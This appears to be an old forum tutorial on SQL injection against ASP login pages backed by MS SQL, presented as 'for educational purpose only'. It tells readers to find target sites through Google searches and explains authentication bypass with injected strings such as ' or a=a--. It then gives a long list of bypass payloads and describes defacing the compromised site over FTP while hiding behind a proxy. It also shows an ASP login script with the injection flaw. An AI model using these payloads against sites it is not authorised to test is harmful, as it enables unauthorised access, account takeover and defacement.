Ok so before we start this tutorial, Its for Educational Purpose only and i m no

1. Ok so before we start this tutorial, Its for Educational Purpose only and i m not responsible for what you do with this neither i will help you with any legal troubles you faces
2. ---------------------------------------------------------------------------------
3. SQL INJECTION Tutorial
4. This is for people in Royalty who have a brief or absolutely no idea what SQLI is and have no idea how to find a
5. vulnerable Tarket to exploit it through simple SQL injection .
6.  
7.  
8.  
9. Section 1
10. 1- DATABASES
11. 2- SQL
12. 3 - MS SQL
13. 4 LOGIN
14.  
15. Section 2
16. 5 LOGIN.ASP /ADMIN/LOGIN.ASP
17. 6 CHECKING THE SOURCE
18. 7- NUMERIC PARAMETERS
19. 8 - THE INJECTION
20. 9- OTHER QUERY STRINGS
21. 10 - WHAT TO DO
22.  
23. 1- DATABASES
24.  
25. This might looks boring for you all if so skip it, I dont Mind The first type of Database infacting a library. This is the best way
26. to look at what exactly a database contains, a method that storing and retrieving data. A database consists of two fields:
27. columns, which are referred to as 'fields' and rows, which are referred to as 'records'. Take an example:
28.  
29. Name D.O.B User ID
30.  
31. Annon 14/2/08 001
32. Alex 11/7/09 002
33. Sofia 12/09/07 003
34.  
35. This is an simple example. I will not go too much into Databases and their workings for now more information regarding this can be found with google
36.  
37.  
38. 2- SQL
39.  
40. SQL is short for Structured Query Language and is a Language that is used to communicate with an SQL Database. SQL
41. communicates with a relational database, the most commonly used database out there. SQL uses queries to get information
42. from tables within the database. There are many commands that SQL uses, but we will not be going into the in the BEGINNERS
43. part of the tutorial, the commands we will be focusing on is as follows:
44.  
45. SELECT - This query is the basis of the SQ[language]. It will be the basis of the following queries, and will guide you
46. to the right the table, and all corresponding fields and records
47. FROM - This query selects the table name eg. 'table1' or 'password'
48. WHERE - This allows you to specify specific conditions that are to be met
49.  
50. The are the basics you would be using in this part of the tutorial. Now to put these commands in action.
51.  
52. 3- MS SQL
53.  
54. MS SQL is what we will be focusing on in this tutorial. MS SQL stands for Microsoft Structured Query Language. It is a
55. cheap alternative to other SQL databases like Oracle. This means that there will be alot of targets out there, weather
56. or not they are vulnerable is another thing, we will discuss that later in this tutorial. We will learn how to hack using
57. out HTTP browser on port 80. In my advanced tutorial, we will also find out how to hack MS SQL on port 1434 (TCP)
58.  
59. 4- LOGIN
60.  
61. This is the basic for a login page that uses SQL (note that this is only an example, you will not find this in the page
62. source 99% of the time)
63.  
64. *NOTE* In SQL, * is a wildcard. It is a shortcut used to represent all values. Also not, None is not = to Null!
65.  
66. " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
67.  
68. Lets say that login= Th3_R@V3N and pass= haxxoRe
69.  
70. SELECT * FROM table1 WHERE login=' Th3_R@V3N ' and pass=' haxxoRe '
71.  
72. Using our SQL querys, we were able to Select the Login from 'table1' and the password was haxxoRe, thus our login would
73. be successful.
74.  
75. 5- LOGIN.ASP /ADMIN/LOGIN.ASP
76.  
77. MS SQL uses logins via the form extenstion .ASP. Doing a search on google, you will find a hell of alot of targets.
78. However not all of these are vulnerable. When you find a target, open it up, you should see a Username Field and a
79. Password field (in most cases). Congradulations, you are now 1337, not, but you have taken the first, and most easiest
80. step.
81.  
82. 6- Checking the Source
83.  
84. You should all know how to look at the source of the page, if not, right click in your browser and goto View Source.
85. There is a number of things you would look at. A typical example of what a webmaster would use would be:
86.  
87. Code:
88.  
89.  
90. <@language="vbscript">
91. <%
92. dim conn,rs,log,pwd
93. log=Request.form("login_name")
94. pwd=Request.form("pass")
95.  
96. set conn = Server.CreateObject("ADODB.Connection")
97. conn.ConnectionString="provider=microsoft.jet.OLED B.4.0;data source=c:\database\tab1.mdb"
98. conn.Open
99. set rs = Server.CreateObject("ADODB.Recordset")
100. rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
101. If rs.EOF
102. response.write("Login failed")
103. else
104. response.write("Login successful")
105. End if
106. %>
107.  
108.  
109.  
110. This is a very basic code, but just gives you an insight into the kind of code that you should look out for. Also
111. check anything between <FORM> and </FORM>, this will most likely give you the method of the query and sometimes you
112. may get hidden values contained.
113.  
114. 7- NUMERIC PARAMETERS
115.  
116. I will not go too much into this, as it is just a beginners guide. However, it is important to note what numeric
117. parameters are. We note that there are normally 3 different types of fields, these are:
118.  
119. String
120. Data
121. Number
122.  
123. The SQL query is passed to determine which type it is. For example
124.  
125. LEET would obviously be a string. However 1337 would be a Number, although it must, also, be considered a string.
126. The difference is that Strings and Dates have quotes around them, whereas Numbers do not.
127.  
128. EXAMPLE
129.  
130. SELECT * FROM table1 WHERE name= ‘LEET’
131. SELECT * FROM table1 WHERE id= 7
132.  
133. This should be remembered when doing advanced hacking of SQL when using the UNION clause. It should also be remember
134. that when doing advanced hacking of SQL, strings would need to break out of the quotes, but that will be covered later.
135.  
136.  
137. 8- THE INJECTION
138.  
139. OK i know that the top stuff has been boring, stiff sh**. But now we get to the good stuff, the actuall injection.
140. What an SQL injection is injecting Specially crafted Querys into the password and/or username field by the use of harmful
141. characters. If the admin has not stripped these harmful characters, then it will be easier to get access into the system
142. by simply fooling it into thinking its that you have the correct passwrod, when you dont. Take the example:
143.  
144. ' or a=a--
145.  
146. This may look simple. But, how can hackers use this to get access? Well let us take a previous example.
147.  
148. " SELECT * FROM 'tablename' WHERE login='"&log&"' and password='"&pass&"' "
149.  
150. Now let us say that use user Magic is an Admin on the site, and you wish to get access to his account, you would use
151. the following injection (i have used 2 differnt query strings to shows 2 different examples of how access will be granted)
152.  
153. User:Magic
154. Password:' or a=a--
155. Password: hey' or 'a'='a
156.  
157. Now if you have a lazy admin, you will get access to the site in Magics account, why? Let us subsitute!
158.  
159. SELECT * FROM table4 WHERE login='Magic' and pass='hi' or 'a'='a'
160.  
161. *NOTE* that the login and password field always have 2 ' after them, eg. 'pass', it is important to note this for the
162. follwing example, so you see why we use hi' or 'a'='a and not hi' or 'a'='a', there is a difference =)
163.  
164. In this example, obviously the password is not 'hi' but on the other hand 'a' does = 'a', so the conditions are met =D
165.  
166. SELECT * FROM table4 WHERE login='Magic' and pass='' or a=a-- '
167.  
168. It is important to note, that -- will make the rest of the query not be checked
169.  
170. In this example, we see that the pass does not equal nothing ('') but in the same case a does = a (remember that -- made
171. the rest of the query not matter, therefore we do not worry about the ' character
172.  
173.  
174. 9 OTHER QUERY STRINGS
175.  
176. Here is a publicly made list of query strings, note that not all will work, so you may have to try a few before you get
177. one that works, or simarly, you could make up your own
178.  
179. hi" or "a"="a
180. hi" or 1=1 --
181. hi' or 1=1 --
182. hi' or 'a'='a
183. hi') or ('a'='a
184. hi") or ("a"="a
185.  
186.  
187.  
188. admin'--
189. ' or 0=0 --
190. " or 0=0 --
191. or 0=0 --
192. ' or 0=0 #
193. " or 0=0 #
194. or 0=0 #
195. ' or 'x'='x
196. " or "x"="x
197. ') or ('x'='x
198. ' or 1=1--
199. " or 1=1--
200. or 1=1--
201. ' or a=a--
202. " or "a"="a
203. ') or ('a'='a
204. ") or ("a"="a
205. hi" or "a"="a
206. hi" or 1=1 --
207. hi' or 1=1 --
208. hi' or 'a'='a
209. hi') or ('a'='a
210. hi") or ("a"="a
211.  
212.  
213. 10 - WHAT TO DO
214.  
215. There are many things a hacker will do when inside, most likely, they will Fuc* the shit up, and most likely, they will
216. be using a proxy WINK. They could then get into the FTP using your name and password and deface the site through the
217. index.html file, but and they would more then likely keep a backup to save their ass some serious jail time.
218. ---------------------------------------------------------------------
219. Enjoy